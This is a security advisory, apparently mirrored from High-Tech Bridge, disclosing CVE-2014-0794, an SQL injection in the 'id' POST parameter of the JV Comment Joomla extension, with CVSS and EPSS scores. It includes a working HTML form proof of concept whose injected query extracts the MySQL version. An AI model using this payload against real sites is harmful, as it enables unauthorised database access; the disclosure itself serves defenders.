Lucene search

K
htbridgeHigh-Tech BridgeHTB23195
HistoryJan 02, 2014 - 12:00 a.m.

SQL Injection in JV Comment Joomla Extension

2014-01-0200:00:00
High-Tech Bridge
www.htbridge.com
26

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.006 Low

EPSS

Percentile

76.2%

High-Tech Bridge Security Research Lab discovered SQL injection vulnerability in JV Comment Joomla Extension, which can be exploited to perform SQL Injection attacks.

  1. SQL Injection in JV Comment Joomla Extension: CVE-2014-0794
    The vulnerability exists due to insufficient validation of β€œid” HTTP POST parameter passed to β€œ/index.php” script. A remote authenticated attacker can execute arbitrary SQL commands in application’s database.
    The following exploitation example displays version of MySQL database:
    <form action=β€œhttp://[host]/index.php” method=β€œpost” name=β€œmain”>
    <input type=β€œhidden” name=β€œoption” value=β€œcom_jvcomment”>
    <input type=β€œhidden” name=β€œtask” value=β€œcomment.like”>
    <input type=β€œhidden” name=β€œid” value=β€œ1 AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))”>
    <input type=β€œsubmit” id=β€œbtn”>
    </form>
CPENameOperatorVersion
jv comment joomla extensionle3.0.2

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.006 Low

EPSS

Percentile

76.2%